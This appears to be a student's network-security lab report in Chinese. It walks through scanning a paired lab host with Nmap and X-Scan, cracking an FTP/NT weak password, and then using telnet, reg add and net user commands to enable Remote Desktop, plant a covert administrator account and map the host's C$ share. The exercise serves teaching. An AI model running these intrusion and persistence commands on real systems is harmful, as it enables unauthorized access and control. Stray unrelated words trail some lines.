信息安全系統設計基礎課外之: 網絡攻防技術 20155202 張旭

信息安全系統設計基礎課外之: 網絡攻防技術實驗 20155202 張旭

信息收集

1、 實驗目的

該實驗爲驗證性實驗。ios

  •  瞭解信息蒐集的通常步驟
  •  學會熟練使用ping命令
  •  學會利用Nmap等工具進行信息蒐集web

    2、 實驗內容

  1. Ping探測
  2. Nmap掃描
  3. 探測總結
    注:詳細實驗操做請參考實驗室服務器上的參考資料。windows

    3、 實驗步驟

  • 本練習主機A、B爲一組,C、D爲一組,E、F爲一組。實驗角色說明以下:
  • 實驗主機 實驗角色 系統環境
  • A、C、E 掃描源/目標 Windows
  • B、D、F 掃描源/目標 Linux
  • 下面以主機A、B爲例,說明實驗步驟。
  • 首先使用「快照X」恢復Windows系統環境。
  • 此實驗主機A可與B同時相互蒐集對方信息,下面的步驟以主機A爲例講解。安全

    1. ping探測

  • 主機A開啓命令行,對主機B進行ping探測,根據主機B的回覆,能夠肯定主機A和主機B之間的連通狀況,還能夠根據回覆數據包的TTL值對操做系統進行猜想。服務器

回覆數據包的TTL值:          
操做系統                           TTL字段值
 Unix及類Unix                         255         
 Windows NT/2K/03                     128 
 Windows 95/98/ME                      32
 Linux Kernel 2.6.x                    64
主機B操做系統可能爲:     Windows NT/2K/03    。

2. Nmap掃描

(1) 對活動主機進行端口掃描
  • 主機A使用Nmap工具對主機B進行TCP端口同步掃描(範圍1-150):
- Nmap命令                     nmap -sS -p 1-150 172.16.0.129           
- 主機B開放的TCP端口            21  23  80  135   139
  • 對主機B進行UDP端口掃描(範圍是110-140):
- Nmap命令                    nmap -sU -p 110-140 172.16.0.129    
- 主機B開放的UDP端口          123    137   138
  • (2) 對活動主機操做系統進行探測

    主機A對主機B進行TCP/IP指紋特徵掃描:網絡

Nmap命令        nmap -sT -O 172.16.0.129       
查看掃描結果
(3) 對活動主機運行服務進行探測
  • HTTP會話分析
由圖19-1-1可判斷目標主機web服務使用的軟件類型是     Mictosoft-IIS/6.0      
請探測目標主機FTP服務使用的軟件類型是               220 Microsoft FTP Service

綜合掃描與安全評估

1、 實驗目的

該實驗爲驗證性實驗。
  •  熟悉X-Scan工具的使用方法
  •  熟悉FTPScan工具的使用方法併發

    2、 實驗內容

    1. 開放服務掃描
    1. 漏洞檢測掃描
    1. 弱口令掃描
      注:詳細實驗操做請參考實驗室服務器上的參考資料。tcp

      3、 實驗步驟

首先使用「快照X」恢復Windows系統環境。工具

(一)開放服務掃描
(1) 設置掃描範圍
  • 本機進入實驗平臺,單擊工具欄「X-Scan」按鈕,啓動X-Scan。依次選擇菜單欄「設置」|「掃描參數」菜單項,打開掃描參數對話框。在「檢測範圍」參數中指定掃描IP的範圍,在「指定IP範圍」輸入要檢測同組主機域名或IP,也能夠對多個IP進行檢測,例如「202.0.0.68-202.0.0.160」,這樣就對這個網段的主機進行檢測。這裏對單一的IP進行掃描,輸入同組主機IP。操作系統

    (2) 全局設置
  • 本機在「全局設置」的「掃描模塊」選項裏,能夠看到待掃描的各類選項,咱們先只對開放服務進行掃描,選擇「開放服務」選項。「併發掃描」選項中可設置線程和併發主機數量,這裏選擇默認設置。「其餘設置」選項中,若是對單一主機進行掃描時,一般選擇「無條件掃描」選項。選擇此選項時X-Scan會對目標進行詳細檢測,這樣結果會比較詳細也會更加準確,但掃描時間會延長。
  • 當對方禁止ICMP回顯請求時,若是設置了「跳過沒有響應的主機」選項,X-Scan會自動跳過該主機,自動檢測下一臺主機。

    (3) 插件設置
  • 在「端口相關設置」選項中能夠自定義一些須要檢測的端口。檢測方式有「TCP」、「SYN」兩種,TCP方式容易被對方發現,準確性要高一些;SYN則相反。
    咱們在這裏選用TCP方式。

    (4) 開始掃描
  • 掃描前請同組主機打開協議分析器,進入「設置」|「定義過濾器」|「選擇協議過濾」,設置過濾協議爲「HTTP」、「FTP」(如圖20-1-1),單擊「新建捕獲窗口」按鈕,點擊「選擇過濾器」按鈕,肯定過濾信息。在新建捕獲窗口工具欄中點擊「開始捕獲數據包」按鈕,開始捕獲數據包。

設置過濾協議
  • 本機設置好X-Scan的相關參數,單擊「肯定」按鈕,而後單擊「開始掃描」。X-Scan會對同組主機進行詳細檢測,掃描過程當中若是出現錯誤會在「錯誤信息」中看到。

    (5) 結束掃描
  • 本機在進行掃描過程當中若是檢測到漏洞的話,可在「漏洞信息」中查看。掃描結束之後自動彈出檢測報告,包括漏洞的信息,以便咱們對同組主機進行詳細的分析。
  • 報告保存在X-Scan文件夾下的log目錄中(C:\ExpNIS\NetAD-Lab\Tools\XScan\log)。報告中能夠查看同組主機中開放的端口以及提供的服務。

    (6) 分析掃描結果
  • 本機分析掃描器生成的掃描結果,對存在的漏洞進行風險評估。
  • 請同組主機中止協議分析器,觀察協議分析器中本機與同組主機的會話狀況。
  • 「注」 因爲開放服務掃描攜帶的信息具備隨機性和不可見性,所以在協議分析器解析FTP命令時在會話交互圖上會出現命令亂碼現象,屬於正常。」

    (二)漏洞檢測腳本掃描
  • (1) 本機對掃描器進行設置
  • 在「全局設置」|「掃描模塊」中只選擇「漏洞檢測腳本」,其它設置與任務一相同。

    (2) 開始掃描
  • 同組主機關閉協議分析器「捕獲窗口」,設置協議分析器的捕獲緩衝區大小爲8M,具體操做方法以下:單擊菜單欄「設置」,選擇「捕獲緩衝區大小」,選擇「8M」。
  • 定義過濾器 | 協議過濾,選擇協議「FTP Control」和「FTP Data」。
  • 新建「捕獲窗口」,選擇此前設置的過濾器,開始捕獲。
  • 本機對同組主機進行掃描。

    (3) 結束掃描
  • 本機對掃描器生成的掃描結果進行分析,並根據掃描結果判斷X-Scan對同組主機進行了哪些類別的FTP掃描行爲。
  • 同組主機中止協議分析器並觀察兩機會話情況。

    (三)弱口令掃描
    本步驟由學生自行操做FTPScan對同組主機進行FTP弱口令掃描,對FTPScan的使用格式爲:
    ftpscan.exe 同組主機IP地址 100(100爲線程數,可自選參數)。
  • 掃描結果保存在C:\ExpNIS\NetAD-Lab\Tools\FtpScan\ftpscan.txt中。

掃描結果

[172.16.0.129   ]:  Found: ftp/ftp@ftp.net
[172.16.0.129   ]:  Found: anonymous/anonymous@anonymous.net
[172.16.0.129   ]:  Found: test/1234

練習三 模擬攻擊方法

1、 實驗目的

該實驗爲設計性實驗。
  •  會使用工具查找主機漏洞
  •  學會對弱口令的利用
  •  瞭解開啓主機默認共享以及在命令提示下開啓服務的方法
  •  經過實驗瞭解如何提升主機的安全性

    2、 實驗內容

    1. 掃描
    1. 開啓遠程桌面服務
    1. 添加磁盤映射
    1. 主機安全加固
  • 注:詳細實驗操做請參考實驗室服務器上的參考資料。

    3、 實驗步驟

(一)初步掃描
  • (1) 主機A點擊工具欄「Zenmap」按鈕啓動Zenmap工具,在「Target」中輸入同組主機B的IP地址,在「Profile」中選擇「Intense scan」,點擊右側的「Scan」按鈕,開始掃描。
  • (2)主機A分析掃描結果,從掃描結果中能夠了解到主機B開放了
Initiating SYN Stealth Scan at 17:38
Scanning 172.16.0.129 [1000 ports]
Discovered open port 21/tcp on 172.16.0.129
Discovered open port 445/tcp on 172.16.0.129
Discovered open port 139/tcp on 172.16.0.129
Discovered open port 1025/tcp on 172.16.0.129
Discovered open port 80/tcp on 172.16.0.129
Discovered open port 23/tcp on 172.16.0.129
Discovered open port 135/tcp on 172.16.0.129
Discovered open port 1027/tcp on 172.16.0.129

端口。

使用的是 windows xp 操做系統,肯定具備攻擊價值。
掃描的部分結果以下:

(二)進一步掃描
  • (1)主機A點擊工具欄「X-Scan」按鈕啓動X-Scan,點擊菜單欄中的「設置」按鈕,在彈出菜單中點擊「掃描參數」,在「檢測範圍」中填寫主機B的IP,展開左側樹狀接口中的「全局設置」在「掃描模塊」選項中分別勾選「開放服務」、「NT-Server弱口令」、「NetBios信息」三個選項,其它選項爲空,點擊「肯定」按鈕,完成掃描參數設定
掃描模塊設置
  • (2)主機A點擊 開始進行掃描。掃描結束後,自動彈出檢測報告。主機A分析掃描結果,主機B開放了23端口,能夠進行telnet鏈接。在139端口中的NetBios信息裏能夠看到主機B的帳戶信息,而且發現了存在弱口令漏洞的test帳戶信息,

帳戶類型爲  :管理員      密碼爲  1234

檢測結果列表

(三)開啓遠程桌面服務
  1. 主機A嘗試使用「遠程桌面」遠程登陸主機B:
    主機A點擊工具欄中「遠程桌面」按鈕,打開遠程桌面鏈接,嘗試登陸主機B,在遠程桌面中輸入主機B的IP,點擊「鏈接」按鈕,因爲主機B沒有開啓遠程桌面的服務,結果出現了「客戶端沒法鏈接到遠程計算機」的提示,遠程登陸失敗。

  2. 主機A使用telnet登陸主機B:
    主機A依次點擊「開始」|「運行」|「cmd」進入命令行,在命令行輸入「telnet 主機B的IP」,在彈出提示中輸入「n」。
    在彈出的telnet歡迎界面中輸入前面步驟中已經掃描出的用戶名和密碼,若登陸成功則出現以下提示:登陸成功

  3. 經過修改註冊表開啓主機B遠程桌面:
    主機A登陸成功後在命令提示符下執行「reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"」查看執行結果,
fDenyTSConnections的值爲    0x1    。
遠程桌面未開啓
  • 主機A在命令提示符下執行「
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

」,刪除該鍵值,

刪除註冊表值
  • 主機A新建一個fDenyTSConnections值爲0的註冊表項,在命令提示符下執行「
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

」肯定,操做成功

新建註冊表值

主機A肯定修改是否成功,

在命令提示符下再次執行    
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"」命令
  • 查看「fDenyTSConnections」的值,「
fDenyTSConnections」的值爲  0x0
主機A再次使用遠程桌面鏈接主機B,鏈接是否成功   是       (是/否)。

  • 「注」 主機A使用遠程桌面鏈接主機B後,即可對主機B進行任何操做,此處不作演示,同窗能夠自行實驗。
漏洞 netbios-ssn (139/tcp) NT-Server弱口令

NT-Server弱口令: "test/1234", 賬戶類型: 管理員(Administrator)
(四)創建新用戶
  • 使用當前得到的帳戶登陸主機B並對其進行操做不免會被察覺,因此主機A須要創建本身的帳戶,方便之後對主機B的控制。
    (1)主機A再次使用「test」帳戶用「telnet」命令登陸主機B,並在命令提示符下執行「net user myadmin 1234 /add」,「myadmin」爲用戶名,「1234」爲密碼。:
新建用戶

(2)主機A將test用戶添加到administrators組中,在命令提示符下執行「net localgroup administrators myadmin /add」。如圖20-2-9所示:

添加用戶到管理員組

(3)主機A使用「myadmin」帳戶遠程桌面登陸主機B,查看效果。

(五)添加磁盤映射

爲了方便之後對主機B的磁盤文件進行操做,主機A須要將主機B的磁盤映射至本機上。

  • (1)主機A使用「myadmin」帳戶telnet登陸主機B,在命令提示符下輸入「net share c$=c: /grant:myadmin,full」。將主機B中的C盤映射爲c$,並賦予徹底控制權限,如圖20-2-10所示:
添加共享
  • (2) 主機A退出telnent,並與主機B創建ipc鏈接,主機A在命令提示符下輸入「net use \主機B的IP\ipc$ "1234" /user:"myadmin"」:
       「注」刪除ipc鏈接使用命令「net use \主機B的IP\ipc$ /del」命令。
創建ipc$空鏈接
  • (3) 主機A繼續執行命令「net use z: \主機B的IP\c$」將主機B開放的默認共享C盤映射爲本身的本地磁盤Z,這樣,操做本身的Z盤就是操做主機B的C盤。
      「注」斷開映射使用「net use z: /del」命令。創建磁盤映射必須先創建ipc鏈接,要映射成的磁盤必須是主機A本地不存在的盤符,例如,本地磁盤已經存在D盤,就不能再將目標主機的某個磁盤映射成主機A的D盤了。

    將目標C盤映射至本地Z盤
  • (4)主機A打開「個人電腦」查看新增長的網絡驅動器Z盤,並嘗試對Z盤的文件進行增、刪、改操做。

映射成功

(六)攻擊的防範方法

  •  經過該實驗咱們能夠了解到,密碼健壯性差和系統上開放的服務,是主機被入侵的主要途徑。具體的防護與加固方法請參見練習四主機安全加固。

實驗體會:本次實驗雖然內容挺亂的,可是好在我將原理搞明白了,先用工具去探測系統返回的包來判斷出系統類型,型號,以及漏洞等,而後掃描系統漏洞,發現系統漏洞後進行攻擊破解,用弱口令窮舉攻擊,從而遠程操做,而後加入本身的用戶在靶機電腦上,達到被攻擊方沒法輕易察覺的目的,因此:咱們仍是應該在平時設置密碼時候將本身密碼弄複雜些,以避免輕易遭受攻擊而被劫持。因此提升安全性的最簡單有效的方法之一就是使用一個不會輕易被暴力破解或者輕易被猜到的密碼。

相關文章
相關標籤/搜索